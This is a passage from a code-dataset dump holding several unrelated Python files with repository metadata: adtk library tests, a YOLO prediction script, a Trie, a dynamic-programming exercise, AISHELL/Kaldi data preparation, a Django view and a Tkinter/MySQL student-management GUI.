transformer.DoubleRollingAggregate(\n window=10, agg=\"hist\", agg_params={\"bins\": [30, 50, 70]}\n ),\n transformer.StandardScale(),\n transformer.ClassicSeasonalDecomposition(freq=2),\n]\n\none2many_models = [\n transformer.RollingAggregate(\n window=10, agg=\"quantile\", agg_params={\"q\": [0.1, 0.5, 0.9]}\n ),\n transformer.RollingAggregate(\n window=10, agg=\"hist\", agg_params={\"bins\": [20, 50, 80]}\n ),\n transformer.Retrospect(n_steps=3),\n]\n\nmany2one_models = [\n detector.MinClusterDetector(KMeans(n_clusters=2)),\n detector.OutlierDetector(\n LocalOutlierFactor(n_neighbors=20, contamination=0.1)\n ),\n detector.RegressionAD(target=\"A\", regressor=LinearRegression()),\n detector.PcaAD(),\n transformer.SumAll(),\n transformer.RegressionResidual(target=\"A\", regressor=LinearRegression()),\n transformer.PcaReconstructionError(),\n]\n\n\n@pytest.mark.parametrize(\"model\", one2one_models)\ndef test_one2one_s2s_w_name(model):\n \"\"\"\n if a one-to-one model is applied to a Series, it should keep the Series\n name unchanged\n \"\"\"\n s_name = pd.Series(\n np.arange(100),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n name=\"A\",\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(s_name)\n else:\n result = model.predict(s_name)\n assert result.name == \"A\"\n\n\n@pytest.mark.parametrize(\"model\", one2one_models)\ndef test_one2one_s2s_wo_name(model):\n \"\"\"\n if a one-to-one model is applied to a Series, it should keep the Series\n name unchanged\n \"\"\"\n s_no_name = pd.Series(\n np.arange(100),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(s_no_name)\n else:\n result = model.predict(s_no_name)\n assert result.name is None\n\n\n@pytest.mark.parametrize(\"model\", one2one_models)\ndef test_one2one_df2df(model):\n \"\"\"\n if a one-to-one model is applied to a DataFrame, it should keep the column\n names unchanged\n \"\"\"\n df = pd.DataFrame(\n np.arange(300).reshape(100, 3),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n columns=[\"A\", \"B\", \"C\"],\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(df)\n else:\n result = model.predict(df)\n assert list(result.columns) == [\"A\", \"B\", \"C\"]\n\n\n@pytest.mark.parametrize(\"model\", one2one_models)\ndef test_one2one_df2list(model):\n \"\"\"\n if a one-to-one model (detector) is applied to a DataFrame and returns a\n dict, the output dict keys should match the input column names\n \"\"\"\n if isinstance(model, _Detector):\n df = pd.DataFrame(\n np.arange(300).reshape(100, 3),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n columns=[\"A\", \"B\", \"C\"],\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_detect(df, return_list=True)\n else:\n result = model.detect(df, return_list=True)\n if sys.version_info[1] >= 6:\n assert list(result.keys()) == [\"A\", \"B\", \"C\"]\n else:\n assert set(result.keys()) == {\"A\", \"B\", \"C\"}\n\n\n@pytest.mark.parametrize(\"model\", one2many_models)\ndef test_one2many_s2df_w_name(model):\n \"\"\"\n if a one-to-many model is applied to a Series, the output should not have\n prefix in column names, no matter whether the input Series has a name.\n \"\"\"\n s_name = pd.Series(\n np.arange(100),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n name=\"A\",\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(s_name)\n else:\n result = model.predict(s_name)\n assert all([col[:2] != \"A_\" for col in result.columns])\n\n\n@pytest.mark.parametrize(\"model\", one2many_models)\ndef test_one2many_s2df_wo_name(model):\n \"\"\"\n if a one-to-many model is applied to a Series, the output should not have\n prefix in column names, no matter whether the input Series has a name.\n \"\"\"\n s_no_name = pd.Series(\n np.arange(100),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(s_no_name)\n else:\n result = model.predict(s_no_name)\n assert all([col[:2] != \"A_\" for col in result.columns])\n\n\n@pytest.mark.parametrize(\"model\", one2many_models)\ndef test_one2many_df2df(model):\n \"\"\"\n if a one-to-many model is applied to a DataFrame, the output should have\n prefix in column names to indicate the input columns they correspond.\n \"\"\"\n df = pd.DataFrame(\n np.arange(300).reshape(100, 3),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n columns=[\"A\", \"B\", \"C\"],\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(df)\n else:\n result = model.predict(df)\n n_cols = round(len(result.columns) / 3)\n assert all([col[:2] == \"A_\" for col in result.columns[:n_cols]])\n assert all([col[2:4] != \"A_\" for col in result.columns[:n_cols]])\n assert all(\n [col[:2] == \"B_\" for col in result.columns[n_cols : 2 * n_cols]]\n )\n assert all(\n [col[2:4] != \"B_\" for col in result.columns[n_cols : 2 * n_cols]]\n )\n assert all([col[:2] == \"C_\" for col in result.columns[2 * n_cols :]])\n assert all([col[2:4] != \"C_\" for col in result.columns[2 * n_cols :]])\n\n\n@pytest.mark.parametrize(\"model\", many2one_models)\ndef test_many2one(model):\n \"\"\"\n The output Series from a many-to-one model should NOT have name\n \"\"\"\n df = pd.DataFrame(\n np.arange(300).reshape(100, 3),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n columns=[\"A\", \"B\", \"C\"],\n )\n if isinstance(model, _TrainableModel):\n result = model.fit_predict(df)\n else:\n result = model.predict(df)\n assert result.name is None\n\n\ndef test_pca_reconstruction():\n df = pd.DataFrame(\n np.arange(300).reshape(100, 3),\n index=pd.date_range(start=\"2017-1-1\", periods=100, freq=\"D\"),\n columns=[\"A\", \"B\", \"C\"],\n )\n result = transformer.PcaReconstruction(k=2).fit_predict(df)\n assert list(result.columns) == [\"A\", \"B\", \"C\"]\n","repo_name":"arundo/adtk","sub_path":"tests/test_series_name.py","file_name":"test_series_name.py","file_ext":"py","file_size_in_byte":8053,"program_lang":"python","lang":"en","doc_type":"code","stars":980,"dataset":"github-code","pt":"6"} +{"seq_id":"10928166867","text":"#-------------------------------------#\n# 对单张图片进行预测\n#-------------------------------------#\nfrom yolo import YOLO\nfrom PIL import Image\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = '2,3,4'\nyolo = YOLO()\n\nwhile True:\n img = input('Input image filename:')\n try:\n image = Image.open(img)\n except:\n print('Open Error! Try again!')\n continue\n else:\n r_image = yolo.detect_image(image)\n r_image.save('img/street_result.jpg')\n # r_image.show()\n","repo_name":"HUxin-liang/YOLOv3","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"74480128506","text":"class TrieNode(object):\n def __init__(self):\n self.is_word = False\n self.children = {}\n\n\nclass Trie(object):\n def __init__(self):\n self.root = TrieNode()\n self.word_list = []\n\n def insert(self, word):\n \"\"\"\n Add `word` to trie\n \"\"\"\n current_node = self.root\n\n for char in word:\n if char not in current_node.children:\n current_node.children[char] = TrieNode()\n current_node = current_node.children[char]\n\n current_node.is_word = True\n\n def exists(self, word):\n \"\"\"\n Check if word exists in trie\n \"\"\"\n current_node = self.root\n\n for char in word:\n if char not in current_node.children:\n return False\n current_node = current_node.children[char]\n\n return current_node.is_word\n\n def suggestionsRec(self, node, word):\n\n # Method to recursively traverse the trie\n # and return a whole word.\n if node.is_word:\n self.word_list.append(word)\n\n for a, n in node.children.items():\n self.suggestionsRec(n, word + a)\n\n def suffixes(self, suffix=''):\n node = self.root\n not_found = False\n temp_word = ''\n self.word_list = []\n\n for a in list(suffix):\n if not node.children.get(a):\n not_found = True\n break\n\n temp_word += a\n node = node.children[a]\n\n if not_found:\n print('Invalid Prefix')\n return\n elif node.is_word and not node.children:\n print('Valid Prefix but no suggestions.')\n return\n\n self.suggestionsRec(node, '')\n\n return self.word_list\n\nMyTrie = Trie()\nwordList = [\n \"ant\", \"anthology\", \"antagonist\", \"antonym\",\n \"fun\", \"function\", \"factory\",\n \"trie\", \"trigger\", \"trigonometry\", \"tripod\"\n]\nfor word in wordList:\n MyTrie.insert(word)\n\noutput = MyTrie.suffixes('trig') # ['ger', 'onometry']\nprint(output)\n\noutput = MyTrie.suffixes('')\nprint(output) # input array\n\noutput = MyTrie.suffixes('abc')\nprint(output) # invalid prefix\n\noutput = MyTrie.suffixes('trigonometry')\nprint(output) # Valid Prefix but no suggestions.","repo_name":"gokulnippani/DataStructures","sub_path":"Project_3/problem_5.py","file_name":"problem_5.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"73542097147","text":"'''\n\n클래스 명 : Ch 1\n\n설명 : 네트워크 선 자르기 입니다.\n\n작성일 : 2022.06.01\n\n수정자 : 김선진\n\n수정한 날자 : 0000.00.00\n\nTodo > \n\n현수는 네트워크 선을 1m, 2m의 길이를 갖는 선으로 자르려고 합니다. 예를 들어 4m의 네트워크 선이 주어진다면\n\n1) 1m+1m+1m+1m \n2) 2m+1m+1m\n3) 1m+2m+1m\n4) 1m+1m+2m\n5) 2m+2m\n\n의 5가지 방법을 생각할 수 있습니다. (2)와 (3)과 (4)의 경우 왼쪽을 기준으로 자르는 위치가 다르면 다른 경우로 생각한다.\n그렇다면 네트워크 선의 길이가 Nm라면 몇 가지의 자르는 방법을 생각할 수 있나요?\n\n▣ 입력설명\n\n첫째 줄은 네트워크 선의 총 길이인 자연수 N(3≤N≤45)이 주어집니다.\n\n▣ 출력설명\n\n첫 번째 줄에 부분증가수열의 최대 길이를 출력한다.\n\n\n▣ 입력예제 \n\n7\n\n▣ 출력예제 \n\n21\n\n'''\n\nimport sys\nfrom collections import deque\n\n\n# 바텀 업\ndef dynamic(N, count_list):\n\n if count_list[N] != 0:\n return count_list[N]\n\n if N == 1:\n return 1\n\n if N == 2:\n return 2\n \n count_list[N] = dynamic(N-1, count_list) + dynamic(N-2, count_list)\n\n return count_list[N]\n\ndef dynamicWithFor(N, count_list):\n\n for i in range(1,N+1):\n if i == 1:\n count_list[i] = 1\n elif i == 2:\n count_list[i] = 2\n else :\n count_list[i] = count_list[i-1] + count_list[i-2]\n \n return count_list[N]\n\n\n\ndef logic(input_file_path, output_file_path):\n\n sys.stdin = open(input_file_path, \"rt\")\n\n result = 0\n\n N = int(input())\n\n count_list = [0 for _ in range(N+1)]\n\n result = dynamic(N, count_list)\n\n sys.stdin = open(output_file_path, \"rt\")\n \n answer = int(input())\n\n print(f\"{input_file_path} : {result == answer}\")\n\n\nif __name__ == \"__main__\":\n for i in range(1, 2):\n logic(f\"in{i}.txt\", f\"out{i}.txt\")","repo_name":"gimseonjin/CodingTest","sub_path":"section8/1, 2. 네트워크 선 자르기/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"70761879229","text":"# aishell1的transcript文件中的说话人编号BAC009S0002W0122 转换成AISHELL2格式 IS0002W0122\n# 因为aishell2采用结巴分词,移除标注的空格\n\nnew_transcripts = []\n# 注意编码方式,开头有个\\ufeff字符\naishell_transcripts = open(\"./aishell_transcript_v0.8_nospace.txt\", \"r\", encoding=\"utf-8-sig\")\n\ntranscripts = aishell_transcripts.readlines()\n# 默认编码方式为utf-8\ntrans_txt = open(\"./trans.txt\", 'w')\n\nfor transcript in transcripts:\n spkid = \"I\" + transcript[6: 16]\n trans = transcript[16: len(transcript)]\n new_transcripts.append(spkid + \"\\t\" + trans) # 带了\\n因此不需要添加换行符\n\ntrans_txt.writelines(new_transcripts)\naishell_transcripts.close()\ntrans_txt.close()\n\n\nimport glob\nimport os\n\ndatadir = \"/users/liuli/database/aishellv1/data_aishell/wav/\"\n\nfor set in [\"train\", \"dev\", \"test\"]:\n new_wav_scp = []\n set_path = os.path.join(datadir, set)\n list_wav = glob.glob(os.path.join(set_path, \"*/*.wav\"))\n\n wav_scp = open(\"wav.scp.\" + set, \"w\")\n\n for filepath in list_wav:\n filename = os.path.basename(filepath)\n spkid = \"I\" + filename[6: 16]\n relative_path = filepath.replace(set_path + \"/\", \"\")\n new_wav_scp.append(spkid + \"\\t\" + relative_path + \"\\n\")\n\n wav_scp.writelines(new_wav_scp)\n wav_scp.close()\n\n cp_trans = \"cp trans.txt \" + set_path\n cp_wav = \"cp wav.scp.\" + set + \" \" + set_path + \"/wav.scp\"\n os.system(cp_trans)\n os.system(cp_wav)\n","repo_name":"liuli1996/kaldi_kws","sub_path":"s5/prepare_data/prepare_files.py","file_name":"prepare_files.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"74575733626","text":"from django.shortcuts import render\n\nfrom core.models import Transaction\nfrom core.section import Section\nsection = Section()\nsection.actionbar = True\nsection.breadcrumb = True\n\ndef index_view(request):\n \n section.page_title = \"Transactions\"\n section.sidebar=False\n\n my_list = Transaction.objects.all().order_by('creation_date')\n context = {\n 'section': section,\n 'query_string': \"\",\n 'my_list': my_list,\n 'user': request.user, \n }\n \n return render(request, 'transactions/index.html', context)\n","repo_name":"Daniel-codemaster/Smart-Tolgate","sub_path":"transactions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"1930689771","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nfrom PIL import Image,ImageTk\r\nfrom tkinter import StringVar\r\nfrom tkinter import messagebox\r\nimport mysql.connector\r\nimport cv2\r\nfrom cv2 import CascadeClassifier\r\nclass Student:\r\n def __init__(self,root):\r\n self.root=root\r\n self.root.geometry(\"1530x790+0+0\")\r\n self.root.title(\"Face recognition System\")\r\n\r\n\r\n #~~~~~~~~~~~~variables~~~~~~~~~~~~~~~~~\r\n self.var_dep=StringVar()\r\n self.var_course=StringVar()\r\n self.var_year=StringVar()\r\n self.var_semester=StringVar()\r\n self.var_std_id=StringVar()\r\n self.var_std_name=StringVar()\r\n self.var_div=StringVar()\r\n self.var_roll=StringVar()\r\n self.var_gender=StringVar()\r\n self.var_dob=StringVar()\r\n self.var_email=StringVar()\r\n self.var_phone=StringVar()\r\n self.var_address=StringVar()\r\n self.var_teacher=StringVar()\r\n \r\n # Load and display image\r\n image=Image.open(\"face.jpg\")\r\n image=image.resize((500,130),Image.ANTIALIAS)\r\n self.photoimg=ImageTk.PhotoImage(image)\r\n\r\n label=tk.Label(self.root,image=self.photoimg)\r\n label.place(x=0,y=0, width=500,height=130)\r\n\r\n image1=Image.open(\"think.jpg\")\r\n image1=image1.resize((510,130),Image.ANTIALIAS)\r\n self.photoimg1=ImageTk.PhotoImage(image1)\r\n\r\n label=tk.Label(self.root,image=self.photoimg1)\r\n label.place(x=860,y=0, width=510,height=130)\r\n \r\n image2=Image.open(\"face.gif\")\r\n image2=image2.resize((400,130),Image.ANTIALIAS)\r\n self.photoimg2=ImageTk.PhotoImage(image2)\r\n\r\n label=tk.Label(self.root,image=self.photoimg2)\r\n label.place(x=500,y=0, width=400,height=130)\r\n\r\n image3=Image.open(\"backg.jpg\")\r\n image3=image3.resize((1370,700),Image.ANTIALIAS)\r\n self.photoimg3=ImageTk.PhotoImage(image3)\r\n\r\n bg=tk.Label(self.root,image=self.photoimg3)\r\n bg.place(x=0,y=130, width=1370,height=700)\r\n\r\n title=tk.Label(bg,text=\"STUDENT MANAGEMENT SYSTEM\", font=(\"times new roman\",25,\"bold\"),bg=\"white\",fg=\"Black\")\r\n title.place(x=0,y=0, width=1530,height=45)\r\n\r\n main_frame=tk.Frame(bg,bd=2)\r\n main_frame.place(x=5,y=50,width=1355,height=510)\r\n\r\n #left frame\r\n Left_frame=tk.LabelFrame(main_frame,bd=2,relief='solid',text=\"Student Details\", font=(\"times new roman\",12))\r\n Left_frame.place(x=10,y=10,width=660,height=490)\r\n\r\n #right frame\r\n Right_frame=tk.LabelFrame(main_frame,bd=2,relief='solid',text=\"Student Details\", font=(\"times new roman\",12))\r\n Right_frame.place(x=680,y=10,width=660,height=490)\r\n\r\n #course frame\r\n Course_frame=tk.LabelFrame(Left_frame,bd=2,bg=\"white\",relief='ridge',text=\"Current Courses\",font=('Calibri',12))\r\n Course_frame.place(x=5,y=15,width=650,height=125)\r\n \r\n #Departments\r\n department_label=tk.Label(Course_frame,text=\"Department:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n department_label.grid(row=0,column=0,padx=10)\r\n\r\n dept_combo=ttk.Combobox(Course_frame,textvariable=self.var_dep,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n dept_combo.grid(row=0,column=1,padx=2,pady=10)\r\n dept_combo[\"values\"]=(\"Select Department\",\"Computer\",\"Chemical\",\"IT\",\"Civil\",\"Mechanical\")\r\n dept_combo.current(0)\r\n\r\n #Course\r\n Course_label=tk.Label(Course_frame,text=\"Course:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n Course_label.grid(row=0,column=2,padx=10)\r\n\r\n Course_combo=ttk.Combobox(Course_frame,textvariable=self.var_course,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n Course_combo.grid(row=0,column=3,padx=2,pady=10)\r\n Course_combo[\"values\"]=(\"Select Course\",\"BE\",\"MSc\",\"Phd\",\"MTech\")\r\n Course_combo.current(0)\r\n\r\n #Year\r\n year_label=tk.Label(Course_frame,text=\"Year:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n year_label.grid(row=1,column=0,padx=10)\r\n\r\n year_combo=ttk.Combobox(Course_frame,textvariable=self.var_year,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n year_combo.grid(row=1,column=1,padx=2,pady=10)\r\n year_combo[\"values\"]=(\"Select Year\",\"2020-2021\",\"2021-22\",\"2022-23\",\"2023-24\")\r\n year_combo.current(0)\r\n\r\n #Semester\r\n semester_label=tk.Label(Course_frame,text=\"Semester:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n semester_label.grid(row=1,column=2,padx=10)\r\n\r\n semester_combo=ttk.Combobox(Course_frame,textvariable=self.var_semester,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n semester_combo.grid(row=1,column=3,padx=2,pady=10)\r\n semester_combo[\"values\"]=(\"Select Semester\",\"Ist Semester\",\"2nd Semester\",\"3rd Semester\",\"4th Semester\")\r\n semester_combo.current(0)\r\n\r\n #Class Student Information\r\n Student_frame=tk.LabelFrame(Left_frame,bd=2,bg=\"white\",relief='ridge',text=\"Class Student Information\",font=('Calibri',12))\r\n Student_frame.place(x=5,y=145,width=650,height=320)\r\n\r\n #Student ID\r\n StudentID_label=tk.Label(Student_frame,text=\"Student ID:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n StudentID_label.grid(row=0,column=0,padx=5,pady=2)\r\n\r\n StudentID_entry=ttk.Entry(Student_frame,textvariable=self.var_std_id,width=20,font=(\"times new roman\",13,\"bold\"))\r\n StudentID_entry.grid(row=0,column=1,padx=5)\r\n\r\n #Student Name\r\n StudentName_label=tk.Label(Student_frame,text=\"Student Name:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n StudentName_label.grid(row=0,column=2,padx=5,pady=5)\r\n\r\n StudentName_entry=ttk.Entry(Student_frame,textvariable=self.var_std_name,width=20,font=(\"times new roman\",13,\"bold\"))\r\n StudentName_entry.grid(row=0,column=3,padx=5,pady=5)\r\n\r\n #class Division\r\n classdiv_label=tk.Label(Student_frame,text=\"Class Division:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n classdiv_label.grid(row=1,column=0,padx=10,pady=10)\r\n\r\n # classdiv_entry=ttk.Entry(Student_frame,textvariable=self.var_div,width=20,font=(\"times new roman\",13,\"bold\"))\r\n # classdiv_entry.grid(row=1,column=1,padx=5,pady=5)\r\n\r\n classdiv_combo=ttk.Combobox(Student_frame,textvariable=self.var_div,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n classdiv_combo.grid(row=1,column=1,padx=2,pady=10)\r\n classdiv_combo[\"values\"]=(\"A\",\"B\",\"C\")\r\n classdiv_combo.current(0)\r\n\r\n #Roll No\r\n Roll_label=tk.Label(Student_frame,text=\"Roll no:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n Roll_label.grid(row=1,column=2,padx=5,pady=5)\r\n\r\n Roll_entry=ttk.Entry(Student_frame,textvariable=self.var_roll,width=20,font=(\"times new roman\",13,\"bold\"))\r\n Roll_entry.grid(row=1,column=3,padx=5,pady=5)\r\n\r\n #Gender\r\n Gender_label=tk.Label(Student_frame,text=\"Gender:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n Gender_label.grid(row=2,column=0,padx=5,pady=5)\r\n \r\n # Gender_entry=ttk.Entry(Student_frame,textvariable=self.var_gender,width=20,font=(\"times new roman\",13,\"bold\"))\r\n # Gender_entry.grid(row=2,column=1,padx=5,pady=5)\r\n \r\n Gender_combo=ttk.Combobox(Student_frame,textvariable=self.var_gender,font=('times new roman',12,\"bold\"),width=17,state=\"readonly\")\r\n Gender_combo.grid(row=2,column=1,padx=2,pady=10)\r\n Gender_combo[\"values\"]=(\"Male\",\"Female\",\"Other\")\r\n Gender_combo.current(0)\r\n\r\n\r\n #dob\r\n dob_label=tk.Label(Student_frame,text=\"DOB:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n dob_label.grid(row=2,column=2,padx=5,pady=5)\r\n \r\n dob_entry=ttk.Entry(Student_frame,textvariable=self.var_dob,width=20,font=(\"times new roman\",13,\"bold\"))\r\n dob_entry.grid(row=2,column=3,padx=5,pady=5)\r\n\r\n #Email\r\n email_label=tk.Label(Student_frame,text=\"Email:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n email_label.grid(row=3,column=0,padx=5,pady=5)\r\n \r\n email_entry=ttk.Entry(Student_frame,textvariable=self.var_email,width=20,font=(\"times new roman\",13,\"bold\"))\r\n email_entry.grid(row=3,column=1,padx=5,pady=5)\r\n\r\n #Phone No.\r\n Phone_label=tk.Label(Student_frame,text=\"Phone:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n Phone_label.grid(row=3,column=2,padx=5,pady=5)\r\n \r\n phone_entry=ttk.Entry(Student_frame,textvariable=self.var_phone,width=20,font=(\"times new roman\",13,\"bold\"))\r\n phone_entry.grid(row=3,column=3,padx=5,pady=5)\r\n\r\n #Address\r\n address_label=tk.Label(Student_frame,text=\"Address:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n address_label.grid(row=4,column=0,padx=5,pady=5)\r\n\r\n address_entry=ttk.Entry(Student_frame,textvariable=self.var_address,width=20,font=(\"times new roman\",13,\"bold\"))\r\n address_entry.grid(row=4,column=1,padx=5)\r\n\r\n #Teacher Name\r\n Teacher_label=tk.Label(Student_frame,text=\"Teacher Name:\",font=(\"times new roman\",12,\"bold\"),bg=\"white\")\r\n Teacher_label.grid(row=4,column=2,padx=5,pady=5)\r\n\r\n Teacher_entry=ttk.Entry(Student_frame,textvariable=self.var_teacher,width=20,font=(\"times new roman\",13,\"bold\"))\r\n Teacher_entry.grid(row=4,column=3,padx=5)\r\n\r\n #Radio Buttons\r\n self.var_radio1=StringVar()\r\n radiobt1=ttk.Radiobutton(Student_frame,variable=self.var_radio1,text=\"Take Photo Sample\",value=\"Yes\")\r\n radiobt1.grid(row=5,column=0)\r\n \r\n\r\n \r\n radiobt1=ttk.Radiobutton(Student_frame,variable=self.var_radio1,text=\"No Photo Sample\",value=\"No\")\r\n radiobt1.grid(row=5,column=1)\r\n\r\n btn_frame=tk.Frame(Student_frame,bd=2,relief='ridge',bg=\"white\")\r\n btn_frame.place(x=0,y=230,width=715,height=36)\r\n \r\n #buttons\r\n save_btn=tk.Button(btn_frame,text=\"Save\",command=self.add_data, width=19, font=('Calibri',12,\"bold\"), bg=\"blue\",fg=\"white\")\r\n save_btn.grid(row=0,column=0)\r\n\r\n update_btn=tk.Button(btn_frame,text=\"Update\",command=self.update_data, width=19, font=('Calibri',12,\"bold\"), bg=\"blue\",fg=\"white\")\r\n update_btn.grid(row=0,column=1)\r\n\r\n delete_btn=tk.Button(btn_frame,text=\"Delete\", command=self.delete_data, width=19, font=('Calibri',12,\"bold\"), bg=\"blue\",fg=\"white\")\r\n delete_btn.grid(row=0,column=2)\r\n \r\n reset_btn=tk.Button(btn_frame,text=\"Reset\", command=self.reset_data, width=19, font=('Calibri',12,\"bold\"), bg=\"blue\",fg=\"white\")\r\n reset_btn.grid(row=0,column=3)\r\n\r\n btn_frame1=tk.Frame(Student_frame,bd=2,relief='ridge',bg=\"white\")\r\n btn_frame1.place(x=0,y=266,width=715,height=30)\r\n\r\n take_photo=tk.Button(btn_frame1,text=\"Take Photo Sample\", command=self.generate_dataset, width=80, font=('Calibri',12,\"bold\"), bg=\"blue\",fg=\"white\")\r\n take_photo.grid(row=0,column=0)\r\n\r\n \r\n\r\n #=============table frame==================\r\n\r\n table_frame=tk.Frame(Right_frame,bd=2,bg=\"white\",relief='ridge')\r\n table_frame.place(x=5,y=100,width=650,height=300)\r\n\r\n scroll_x=ttk.Scrollbar(table_frame,orient=\"horizontal\")\r\n scroll_y=ttk.Scrollbar(table_frame,orient=\"vertical\")\r\n\r\n self.table=ttk.Treeview(table_frame,column=(\"dep\",\"course\",\"year\",\"sem\",\"id\",\"name\",\"div\",\"roll\",\"gender\",\"dob\",\"email\",\"phone\",\"address\",\"teacher\",\"photo\"),xscrollcommand=scroll_x.set,yscrollcommand=scroll_y.set)\r\n\r\n scroll_x.pack(side=\"bottom\",fill=\"x\")\r\n scroll_y.pack(side=\"right\",fill=\"y\")\r\n scroll_x.config(command=self.table.xview)\r\n scroll_y.config(command=self.table.yview)\r\n\r\n self.table.heading(\"dep\",text=\"Department\")\r\n self.table.heading(\"course\",text=\"Course\")\r\n self.table.heading(\"year\",text=\"Year\")\r\n self.table.heading(\"sem\",text=\"Semester\")\r\n self.table.heading(\"id\",text=\"StudentID\")\r\n self.table.heading(\"name\",text=\"Name\")\r\n self.table.heading(\"div\",text=\"Division\")\r\n self.table.heading(\"roll\",text=\"Roll No\")\r\n self.table.heading(\"gender\",text=\"Gender\")\r\n self.table.heading(\"dob\",text=\"DOB\")\r\n self.table.heading(\"email\",text=\"Email\")\r\n self.table.heading(\"phone\",text=\"Phone\")\r\n self.table.heading(\"address\",text=\"Address\")\r\n self.table.heading(\"teacher\",text=\"Teacher\")\r\n self.table.heading(\"photo\",text=\"PhotoSampleStatus\")\r\n self.table[\"show\"]=\"headings\"\r\n\r\n self.table.column(\"dep\",width=100)\r\n self.table.column(\"course\",width=100)\r\n self.table.column(\"year\",width=100)\r\n self.table.column(\"sem\",width=100)\r\n self.table.column(\"id\",width=100)\r\n self.table.column(\"name\",width=100)\r\n self.table.column(\"div\",width=100)\r\n self.table.column(\"roll\",width=100)\r\n self.table.column(\"gender\",width=100)\r\n self.table.column(\"dob\",width=100)\r\n self.table.column(\"email\",width=100)\r\n self.table.column(\"phone\",width=100)\r\n self.table.column(\"address\",width=100)\r\n self.table.column(\"teacher\",width=100)\r\n self.table.column(\"photo\",width=100)\r\n \r\n self.table.pack(fill='both',expand=1)\r\n self.table.bind(\"\",self.get_cursor)\r\n self.fetch()\r\n\r\n \r\n def add_data(self):\r\n if self.var_dep.get()==\"Select Department\" or self.var_std_name.get()==\"\" or self.var_std_id.get()==\"\":\r\n messagebox.showerror(\"Error\",\"All Fields are required\",parent=self.root)\r\n else:\r\n try:\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"guptayash\",password=\"Ash_12345\",database=\"face_manag\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"insert into students values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\",(self.var_dep.get(),self.var_course.get(),self.var_year.get(),self.var_semester.get(),self.var_std_id.get(),self.var_std_name.get(),self.var_div.get(),self.var_roll.get(),self.var_gender.get(),self.var_dob.get(),self.var_email.get(),self.var_phone.get(),self.var_address.get(),self.var_teacher.get(),self.var_radio1.get()))\r\n conn.commit()\r\n self.fetch()\r\n conn.close()\r\n messagebox.showinfo(\"Success\",\"Student details has been added successfully\",parent=self.root)\r\n except Exception as es:\r\n messagebox.showerror(\"Error\",f\"Due to :{str(es)}\",parent=self.root)\r\n\r\n #========fetch_data============\r\n def fetch(self):\r\n conn=mysql.connector.connect(host=\"localhost\",username=\"guptayash\",password=\"Ash_12345\",database=\"face_manag\")\r\n my_cursor=conn.cursor()\r\n my_cursor.execute(\"select * from students\")\r\n data=my_cursor.fetchall()\r\n \r\n if(len(data)!=0):\r\n self.table.delete(*self.table.get_children())\r\n for i in data:\r\n self.table.insert(\"\",\"end\",values=i)\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\n #============gest cursor=================\r\n def get_cursor(self,event=\"\"):\r\n cursor_focus=self.table.focus()\r\n content=self.table.item(cursor_focus)\r\n data=content[\"values\"]\r\n\r\n self.var_dep.set(data[0]),\r\n self.var_course.set(data[1]),\r\n self.var_year.set(data[2]),\r\n self.var_semester.set(data[3]),\r\n self.var_std_id.set(data[4]),\r\n self.var_std_name.set(data[5]),\r\n self.var_div.set(data[6]),\r\n self.var_roll.set(data[7]),\r\n self.var_gender.set(data[8]),\r\n self.var_dob.set(data[9]),\r\n self.var_email.set(data[10]),\r\n self.var_phone.set(data[11]),\r\n self.var_address.set(data[12]),\r\n self.var_teacher.set(data[13]),\r\n self.var_radio1.set(data[14])\r\n \r\n#==========update fnc=================\r\n\r\n 